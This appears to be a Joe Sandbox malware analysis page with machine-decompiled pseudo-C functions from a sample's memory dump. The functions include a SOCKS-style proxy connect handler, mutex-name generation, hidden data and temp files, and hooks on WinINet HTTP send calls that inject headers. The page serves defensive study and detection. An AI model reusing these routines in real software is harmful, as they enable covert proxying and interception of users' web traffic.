API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 02eae7b6a0a1cb5b38a446be1c9061bb6a1818d37bc3b58915983c7c54284c90
Instruction ID: 333a36956a3762661a80c9fa3a3a8e6a8537e2070b5501953b44bef1bbc48bf9
Opcode Fuzzy Hash: 02eae7b6a0a1cb5b38a446be1c9061bb6a1818d37bc3b58915983c7c54284c90
Instruction Fuzzy Hash: 5BF0AE71E10156A69B30B5FE9CC4DFF76ACDB853A4F000136E711D1082D774880586B1

Uniqueness

Uniqueness Score: -1.00%

Function 012CA07E Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E012CA07E(char __ecx, void* __edx, void* __eflags) {
				char _v5;
				char _v9;
				char _v16;
				char _v20;
				signed int _v24;
				unsigned int _v29;
				short _v31;
				signed char _v32;
				unsigned int _v44;
				short _v46;
				char _v48;
				char _v304;
				void* _t64;
				signed int _t65;
				short _t74;
				void* _t76;
				void* _t79;
				void* _t81;
				char _t84;
				char _t94;
				char* _t96;
				char _t118;
				void* _t133;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				void* _t147;
				void* _t148;
				intOrPtr _t149;
				void* _t150;

				_t141 = __edx;
				_v16 = __ecx;
				_v24 = 0 | L012B185C(__ecx) == 0x00000017;
				_t64 = L012B19E7(_v16,  &_v32, 7, __edx);
				if(_t64 == 0) {
					return _t64;
				} else {
					while(1) {
						_t65 = L012B19E7(_v16,  &_v5, 1, _t141);
						if(_t65 == 0) {
							break;
						}
						if(_v5 == 0) {
							_t110 = _v29;
							_v9 = 0x5a;
							if(((_v29 & 0x00ff0000 | _v29 >> 0x00000010) >> 0x00000008 | (_t110 & 0x0000ff00 | _t110 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								_t142 = 0;
								L22:
								_v5 = 1;
								if(_v9 != 0x5a) {
									L48:
									_t65 = E012CA009(_v16, 0xffffffff, _v9, _v24) & 0xffffff00 | _t72 != 0x00000000;
									L36:
									L37:
									return _t65;
								}
								_t133 = 0x10;
								L012B19F6( &_v48, _t133);
								_t74 = 2;
								_v48 = _t74;
								_t76 = (_v32 & 0x000000ff) - 1;
								if(_t76 == 0) {
									_v46 = _v31;
									_v44 = _v29;
									_t79 = L012B173F( &_v48);
									_t146 = _t79;
									if(_t79 != 0xffffffff) {
										L012B17B2(_t146, 1);
										_t81 = E012CA009(_v16, _t146, 0x5a, _v24);
										if(_t81 != 1) {
											if(_t81 != 0xffffffff) {
												_v5 = 0;
											} else {
												_v9 = 0x5b;
											}
										} else {
											_t81 = L012B108C(_v16, _t146);
										}
										L012B1B22(_t81, _t146);
										if(_v5 != 1 || _v9 == 0x5a) {
											L35:
											_t65 = _v5;
											goto L36;
										} else {
											goto L48;
										}
									}
									L40:
									_v9 = 0x5b;
									goto L48;
								}
								if(_t76 != 1) {
									goto L40;
								}
								_t84 = L012B187A( &_v48, 1);
								_v20 = _t84;
								if(_t84 == 0xffffffff) {
									goto L40;
								}
								_t147 = E012CA009(_v16, _t84, 0x5a, _v24);
								if(_t147 != 1) {
									_t118 = _v20;
									L32:
									L012B1B22(_t85, _t118);
									if(_t147 == 0xffffffff) {
										goto L40;
									}
									if(_t147 != 1) {
										_v5 = 0;
									}
									goto L35;
								}
								_t143 = L012B17D0( &_v20, 1, _t142, _t142, _t142,  &_v16, 1);
								L012B1B22(_t88, _v20);
								if(_t143 == 0xffffffff) {
									goto L40;
								}
								L012B17B2(_t143, 1);
								_t147 = E012CA009(_v16, _t143, 0x5a, _v24 | 0x00000002);
								if(_t147 == 1) {
									_t85 = L012B108C(_v16, _t143);
								}
								_t118 = _t143;
								goto L32;
							}
							_t148 = 0;
							while(L012B19E7(_v16,  &_v5, 1, _t141) != 0) {
								_t94 = _v5;
								 *((char*)(_t150 + _t148 - 0x12c)) = _t94;
								if(_t94 == 0) {
									_t142 = 0;
									_t96 =  &_v304;
									_v20 = 0;
									__imp__getaddrinfo(_t96, 0, 0,  &_v20);
									if(_t96 == 0) {
										_t149 = _v20;
										while(_t149 != _t142) {
											if( *((intOrPtr*)(_t149 + 4)) == 2) {
												L012B1947( &_v29,  *((intOrPtr*)(_t149 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t149 != _t142) {
													goto L22;
												}
												goto L12;
											}
											_t149 =  *((intOrPtr*)(_t149 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v9 = 0x5b;
									goto L22;
								}
								_t148 = _t148 + 1;
								if(_t148 <= 0xff) {
									continue;
								}
								break;
							}
							_t65 = 0;
							goto L36;
						}
					}
					goto L37;
				}
			}

0x012ca088
0x012ca08a
0x012ca0a1
0x012ca0a7
0x012ca0ae
0x012ca25e
0x012ca0b4
0x012ca0c0
0x012ca0c8
0x012ca0cf
0x00000000
0x00000000
0x012ca0be
0x012ca0d6
0x012ca0fe
0x012ca107
0x012ca195
0x012ca197
0x012ca19b
0x012ca19e
0x012ca2ca
0x012ca2dc
0x012ca25a
0x012ca25b
0x00000000
0x012ca25b
0x012ca1a6
0x012ca1aa
0x012ca1b1
0x012ca1b2
0x012ca1ba
0x012ca1bb
0x012ca263
0x012ca26d
0x012ca270
0x012ca275
0x012ca27a
0x012ca286
0x012ca294
0x012ca29b
0x012ca2ac
0x012ca2b4
0x012ca2ae
0x012ca2ae
0x012ca2ae
0x012ca29d
0x012ca2a2
0x012ca2a2
0x012ca2ba
0x012ca2c2
0x012ca257
0x012ca257
0x00000000
0x00000000
0x00000000
0x00000000
0x012ca2c2
0x012ca27c
0x012ca27c
0x00000000
0x012ca27c
0x012ca1c2
0x00000000
0x00000000
0x012ca1cd
0x012ca1d2
0x012ca1d8
0x00000000
0x00000000
0x012ca1ec
0x012ca1f0
0x012ca242
0x012ca245
0x012ca245
0x012ca24d
0x00000000
0x00000000
0x012ca251
0x012ca253
0x012ca253
0x00000000
0x012ca251
0x012ca207
0x012ca209
0x012ca211
0x00000000
0x00000000
0x012ca217
0x012ca22e
0x012ca232
0x012ca239
0x012ca239
0x012ca23e
0x00000000
0x012ca23e
0x012ca10d
0x012ca10f
0x012ca120
0x012ca123
0x012ca12c
0x012ca142
0x012ca146
0x012ca14d
0x012ca150
0x012ca158
0x012ca160
0x012ca16e
0x012ca169
0x012ca181
0x012ca186
0x012ca189
0x012ca191
0x00000000
0x00000000
0x00000000
0x012ca193
0x012ca16b
0x012ca16b
0x00000000
0x012ca172
0x012ca15a
0x012ca15a
0x00000000
0x012ca15a
0x012ca12e
0x012ca135
0x00000000
0x00000000
0x00000000
0x012ca135
0x012ca137
0x00000000
0x012ca137
0x012ca0be
0x00000000
0x012ca0d1

APIs

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 012CA150
freeaddrinfo.WS2_32(?,?,?,00000004,?,?,00000001,?,?,00000007), ref: 012CA189

Strings

Z, xrefs: 012CA2C4

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: freeaddrinfogetaddrinfo
String ID: Z
API String ID: 1109861670-1505515367
Opcode ID: 928dedcafcab9bbe18a53678d98bb3d73f6b7a3bb9ceab53c3da3c3da0c22cab
Instruction ID: 708726f4776c55975d386a3b10e1ba4a29ed0789c7069bd5b01694e8ae0aaa3a
Opcode Fuzzy Hash: 928dedcafcab9bbe18a53678d98bb3d73f6b7a3bb9ceab53c3da3c3da0c22cab
Instruction Fuzzy Hash: 20713831D2016EAADF259AA8DC55AFEBB72AF81780F00836DD761B32D0F6714905C752

Uniqueness

Uniqueness Score: -1.00%

Function 012BCC4E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E012BCC4E(void* __ecx, unsigned int __edx, void* __edi, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v280;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				signed int* _t30;
				void* _t31;
				void* _t38;
				char* _t44;
				void* _t45;
				void* _t46;
				intOrPtr _t47;
				signed int _t51;
				void* _t52;

				_t46 = __edi;
				L012B1947( &_v20, __ecx, 0x10);
				_v20 = _v20 ^ __edx;
				_v16 = _v16 ^ __edx;
				_v14 = _v14 ^ __edx >> 0x00000010;
				_t38 = 0;
				_t26 = 0;
				do {
					 *(_t52 + _t38 - 8) =  *(_t52 + _t38 - 8) ^  *(_t52 + _t26 + 8);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t38 = _t38 + 1;
				} while (_t38 < 8);
				if(_a12 != 0) {
					_push(L012B1947( &_v280, _a12, 0x102));
					_t45 = 0x10;
					L012B1271( &_v20, _t45);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 == 0) {
					L12:
					_t29 = _a8;
				} else {
					_t31 = _t28 - 1;
					if(_t31 == 0) {
						_t44 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t31 != 1) {
							goto L12;
						} else {
							_t44 = L"Global\\";
							_push(7);
							L11:
							_pop(_t51);
							_push(_t46);
							_t47 = _a8;
							L012B164F(_t47, _t44, _t51);
							_t29 = _t47 + _t51 * 2;
						}
					}
				}
				_t30 =  &_v20;
				__imp__StringFromGUID2(_t30, _t29, 0x28);
				return _t30;
			}

0x012bcc4e
0x012bcc5e
0x012bcc63
0x012bcc66
0x012bcc6d
0x012bcc71
0x012bcc73
0x012bcc75
0x012bcc79
0x012bcc7d
0x012bcc81
0x012bcc83
0x012bcc83
0x012bcc85
0x012bcc86
0x012bcc8f
0x012bcca5
0x012bcca8
0x012bccac
0x012bccac
0x012bccb5
0x012bccb9
0x012bcce4
0x012bcce4
0x012bccbb
0x012bccbb
0x012bccbc
0x012bccca
0x012bcccf
0x00000000
0x012bccbe
0x012bccbf
0x00000000
0x012bccc1
0x012bccc1
0x012bccc6
0x012bccd1
0x012bccd1
0x012bccd2
0x012bccd3
0x012bccd9
0x012bccde
0x012bcce1
0x012bccbf
0x012bccbc
0x012bccea
0x012bccee
0x012bccf6

APIs

StringFromGUID2.OLE32(00000000,?,00000028,?,?,?,00000010), ref: 012BCCEE

Strings

Global\, xrefs: 012BCCC1
Local\, xrefs: 012BCCCA

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: b3461a6ab8590ed2f43d1b94d7a16a5b4376dcf1b4c1b2159adcca9891df8154
Instruction ID: 38619aae3d5f39c30ab51c04f676f182635a456fec91b45ed211860e0be405da
Opcode Fuzzy Hash: b3461a6ab8590ed2f43d1b94d7a16a5b4376dcf1b4c1b2159adcca9891df8154
Instruction Fuzzy Hash: 6B11EF3262014FA7EF14DBA8DC86BFF7769FB25754F048426EA12E6080D6B4A520C750

Uniqueness

Uniqueness Score: -1.00%

Function 012C1246 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E012C1246() {
				int _t10;
				void* _t11;
				void* _t12;
				signed int _t15;
				void* _t21;
				signed int _t26;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t37;

				_t35 = _t37 - 0x74;
				if(( *(_t35 + 0x7c) & 0x00000001) != 0) {
					L9:
					_t10 = 1;
				} else {
					_t11 = _t35 - 0x54;
					__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t11, _t29, _t32);
					if(_t11 != 0) {
						_push(0);
					} else {
						_t26 = L"\\oemfpc.dat";
						L012B101E(_t35 - 0x54, 0x16);
						_t21 = 0x14;
						_t34 = L012B1C17(_t21);
						_t15 = L012B1168(_t35 - 0x54, _t26);
						_t27 = _t34;
						if((_t15 & _t26) != 0xffffffff) {
							L012B12B7(_t35 - 0x54, _t27, 0x10);
						} else {
							L012B1028(0, _t27, 8, 8);
							L012B14A1(_t35 - 0x54, _t34, 0x10);
						}
						_push(_t34);
					}
					_t12 = CreateEventW(0x12dc7c8, 1, 0, ??);
					 *0x12dcc58 =  *0x12dcc58 | 0xffffffff;
					 *0x12dcc54 = _t12;
					if(_t12 != 0) {
						goto L9;
					} else {
						_t10 = 0;
					}
				}
				return _t10;
			}

0x012c1247
0x012c1255
0x012c12e7
0x012c12e7
0x012c125b
0x012c125d
0x012c1268
0x012c1270
0x012c12c2
0x012c1272
0x012c1274
0x012c127c
0x012c1283
0x012c128c
0x012c128e
0x012c1295
0x012c129a
0x012c12bb
0x012c129c
0x012c12a2
0x012c12ae
0x012c12ae
0x012c12b3
0x012c12b3
0x012c12cb
0x012c12d1
0x012c12db
0x012c12e1
0x00000000
0x012c12e3
0x012c12e3
0x012c12e3
0x012c12e1
0x012c12ed

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012C1268
CreateEventW.KERNEL32(012DC7C8,00000001,00000000,00000000), ref: 012C12CB

Strings

\oemfpc.dat, xrefs: 012C1274

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CreateEventFolderPath
String ID: \oemfpc.dat
API String ID: 210964451-2109668802
Opcode ID: fa2948eaff286f1aafd3575207976adca93a6545a2695c0bad05b839c6c0446e
Instruction ID: 472e1023396e4cfd4c910bd58ac5d8df27047be285c3f0868c92f42be8434ea1
Opcode Fuzzy Hash: fa2948eaff286f1aafd3575207976adca93a6545a2695c0bad05b839c6c0446e
Instruction Fuzzy Hash: 0E113A71B60294A2E730D6B5ED57FEF33A99BA2F10F20871CA752D60C5DAB44628C351

Uniqueness

Uniqueness Score: -1.00%

Function 012C1803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C1803(void* __ecx, signed int __edx) {
				char _v104;
				void* _v154;
				void* _v174;
				void* _v194;
				char _v592;
				void* _t10;
				int _t12;
				void* _t15;
				void* _t16;
				void* _t17;
				signed int _t24;
				WCHAR* _t27;
				WCHAR* _t28;

				_t24 = __edx;
				_t28 = __edx;
				_t17 = __ecx;
				 *__edx = 0;
				L012B11AE( &_v592);
				_t10 = _t17;
				if(_t10 == 0) {
					L6:
					goto L7;
				} else {
					_t15 = _t10 - 1;
					if(_t15 == 0) {
						L7:
						_t27 = 0x12dc7f0;
						goto L8;
					} else {
						_t16 = _t15 - 1;
						if(_t16 == 0) {
							goto L6;
						} else {
							_t12 = _t16 - 1;
							if(_t12 == 0) {
								_t27 = L"SOFTWARE\\Microsoft";
								L8:
								_t12 = L012B1B5E(_t24 | 0xffffffff,  &_v104, 0x32);
								if(_t12 != 0) {
									_t12 = L012B1203(_t28, _t27,  &_v104);
									if(_t12 == 0) {
										L12:
										 *_t28 = 0;
										return 0;
									}
									if(_t17 == 0) {
										_t12 = PathRenameExtensionW(_t28, L".dat");
										if(_t12 == 0) {
											goto L12;
										}
									}
								}
							}
						}
					}
				}
				return _t12;
			}

0x012c1803
0x012c180e
0x012c1810
0x012c181b
0x012c181e
0x012c1825
0x012c1828
0x012c1848
0x00000000
0x012c182a
0x012c182a
0x012c182b
0x012c184e
0x012c184e
0x00000000
0x012c182d
0x012c182d
0x012c182e
0x00000000
0x012c1830
0x012c1830
0x012c1831
0x012c1833
0x012c1853
0x012c185c
0x012c1863
0x012c186d
0x012c1874
0x012c188a
0x012c188c
0x00000000
0x012c188c
0x012c1878
0x012c1880
0x012c1888
0x00000000
0x00000000
0x012c1888
0x012c1878
0x012c1863
0x012c1831
0x012c182e
0x012c182b
0x012c1893

APIs

PathRenameExtensionW.SHLWAPI(?,.dat,?,?,00000032), ref: 012C1880

Strings

.dat, xrefs: 012C187A
SOFTWARE\Microsoft, xrefs: 012C1833

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ExtensionPathRename
String ID: .dat$SOFTWARE\Microsoft
API String ID: 3337224433-47915998
Opcode ID: 0b66c22b232dd087f1a43fae9086fa87e301f51e60fc56b905efe37e52bac6a1
Instruction ID: 482f465987cb273ffe93980278e49c5aed4adc8587351a13ba00bda1cc39f15a
Opcode Fuzzy Hash: 0b66c22b232dd087f1a43fae9086fa87e301f51e60fc56b905efe37e52bac6a1
Instruction Fuzzy Hash: 40012D2173421696FB28DB6CDC927FB73A9DF50680F54036D8705D31C2FB60D965C615

Uniqueness

Uniqueness Score: -1.00%

Function 012BE155 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E012BE155(char __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				short _v1044;
				void* _t13;
				void* _t18;
				void* _t25;
				char _t26;
				void* _t27;

				_t18 = __edx;
				_t26 = __ecx;
				if(GetTempPathW(0xf6,  &_v1044) - 1 > 0xf5) {
					L8:
					return 0;
				}
				if(_t26 == 0) {
					_t26 = L"tmp";
				}
				_t25 = 0;
				while(1) {
					_push(_t18);
					_push(L012B122B());
					_t13 = L012B1A8C( &_v524, 0x104, L"%s%08x.%s", _t26);
					_t27 = _t27 + 0x18;
					if(_t13 == 0xffffffff) {
						goto L8;
					}
					if(L012B1203(_a4,  &_v1044,  &_v524) == 0 || L012B14A1(_a4, 0, 0) == 0) {
						_t25 = _t25 + 1;
						if(_t25 < 0x64) {
							continue;
						}
						goto L8;
					} else {
						return 1;
					}
				}
				goto L8;
			}

0x012be16d
0x012be16f
0x012be17d
0x012be1df
0x00000000
0x012be1df
0x012be181
0x012be183
0x012be183
0x012be188
0x012be18a
0x012be18a
0x012be190
0x012be1a3
0x012be1a8
0x012be1ae
0x00000000
0x00000000
0x012be1c7
0x012be1d9
0x012be1dd
0x00000000
0x00000000
0x00000000
0x012be1e8
0x00000000
0x012be1e8
0x012be1c7
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 012BE171

Strings

%s%08x.%s, xrefs: 012BE192
tmp, xrefs: 012BE183, 012BE191

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: PathTemp
String ID: %s%08x.%s$tmp
API String ID: 2920410445-234517578
Opcode ID: 0a4828b5fc33f08f2ef998c832e50e46b936c7e6e2d22bfd3dcdfda4a3914b82
Instruction ID: 378cafef84bb688ae5d49143acaf77b547d910adbd5aae16246c3dbc8be3e952
Opcode Fuzzy Hash: 0a4828b5fc33f08f2ef998c832e50e46b936c7e6e2d22bfd3dcdfda4a3914b82
Instruction Fuzzy Hash: D80168B2A3022923DB20A628DCC5EEF3718CB413E8F014571AF15971C1D8B09D868790

Uniqueness

Uniqueness Score: -1.00%

Function 012D1545 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012D1545(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
				char _v20;
				char _v24;
				long _v32;
				char* _v36;
				char _v44;
				intOrPtr _v48;
				void* _t42;

				if((L012B150A() & 0x000000ff) == 0) {
					L9:
					return HttpSendRequestExA(_a4, _a8, _a12, _a16, _a20);
				}
				_t44 = _a8;
				if(_a8 != 0) {
					L012B1947( &_v44, _a8, 0x28);
					__eflags = _v32;
					if(__eflags != 0) {
						__eflags = _v36;
						if(__eflags != 0) {
							HttpAddRequestHeadersA(_a4, _v36, _v32, 0xa0000000);
							_v36 = _v36 & 0x00000000;
							_t13 =  &_v32;
							 *_t13 = _v32 & 0x00000000;
							__eflags =  *_t13;
						}
					}
				} else {
					_t42 = 0x28;
					L012B19F6( &_v44, _t42);
					_v44 = 0x28;
				}
				_v48 = E012D0CDB(_a4,  &_v24, _t44,  &_v20);
				if(_v48 == 0xffffffff) {
					_a8 =  &_v44;
					goto L9;
				} else {
					return _v48;
				}
			}

0x012d1555
0x012d15ca
0x00000000
0x012d15d9
0x012d1557
0x012d155b
0x012d157a
0x012d157f
0x012d1583
0x012d1585
0x012d1589
0x012d1599
0x012d159f
0x012d15a3
0x012d15a3
0x012d15a3
0x012d15a3
0x012d1589
0x012d155d
0x012d155f
0x012d1563
0x012d1568
0x012d1568
0x012d15b6
0x012d15bd
0x012d15c7
0x00000000
0x012d15bf
0x00000000
0x012d15bf

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,A0000000), ref: 012D1599
HttpSendRequestExA.WININET(?,?,?,?,?), ref: 012D15D9

Strings

(, xrefs: 012D1568

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: HttpRequest$HeadersSend
String ID: (
API String ID: 2674042921-3887548279
Opcode ID: 24740ef1dbefbbfa7ca85bc29be6bf0a50a33bd861a7f29932b4f46600be1c36
Instruction ID: ed0021f9b64e6a787d5dd013b8385f287baf7898d05e0e42ab02169c19daf333
Opcode Fuzzy Hash: 24740ef1dbefbbfa7ca85bc29be6bf0a50a33bd861a7f29932b4f46600be1c36
Instruction Fuzzy Hash: C9111371C1020EEBDF119FA4E848BED7BB5BF08325F488115EA12750A0D77996AACF64

Uniqueness

Uniqueness Score: -1.00%

Function 012D1480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012D1480(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
				char _v20;
				char _v24;
				long _v32;
				WCHAR* _v36;
				char _v44;
				intOrPtr _v48;
				void* _t42;

				if((L012B150A() & 0x000000ff) == 0) {
					L9:
					return HttpSendRequestExW(_a4, _a8, _a12, _a16, _a20);
				}
				_t44 = _a8;
				if(_a8 != 0) {
					L012B1947( &_v44, _a8, 0x28);
					__eflags = _v32;
					if(__eflags != 0) {
						__eflags = _v36;
						if(__eflags != 0) {
							HttpAddRequestHeadersW(_a4, _v36, _v32, 0xa0000000);
							_v36 = _v36 & 0x00000000;
							_t13 =  &_v32;
							 *_t13 = _v32 & 0x00000000;
							__eflags =  *_t13;
						}
					}
				} else {
					_t42 = 0x28;
					L012B19F6( &_v44, _t42);
					_v44 = 0x28;
				}
				_v48 = E012D0CDB(_a4,  &_v24, _t44,  &_v20);
				if(_v48 == 0xffffffff) {
					_a8 =  &_v44;
					goto L9;
				} else {
					return _v48;
				}
			}

0x012d1490
0x012d1505
0x00000000
0x012d1514
0x012d1492
0x012d1496
0x012d14b5
0x012d14ba
0x012d14be
0x012d14c0
0x012d14c4
0x012d14d4
0x012d14da
0x012d14de
0x012d14de
0x012d14de
0x012d14de
0x012d14c4
0x012d1498
0x012d149a
0x012d149e
0x012d14a3
0x012d14a3
0x012d14f1
0x012d14f8
0x012d1502
0x00000000
0x012d14fa
0x00000000
0x012d14fa

APIs

HttpAddRequestHeadersW.WININET(?,00000000,00000000,A0000000), ref: 012D14D4
HttpSendRequestExW.WININET(?,?,?,?,?), ref: 012D1514

Strings

(, xrefs: 012D14A3

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: HttpRequest$HeadersSend
String ID: (
API String ID: 2674042921-3887548279
Opcode ID: bd74803e76b06f9a87c464aa639df6e94bf56b1c4d865ffd199008bf976beabb
Instruction ID: ecd099656808c2fe2e99af7d20904f5668ba1c414791e5a74ceab1a394e888fb
Opcode Fuzzy Hash: bd74803e76b06f9a87c464aa639df6e94bf56b1c4d865ffd199008bf976beabb
Instruction Fuzzy Hash: 7011F83181020EEBDF129FA4D848BEE7BB5FF08325F04C115EA12751A0D77895A6DF64

Uniqueness

Uniqueness Score: -1.00%

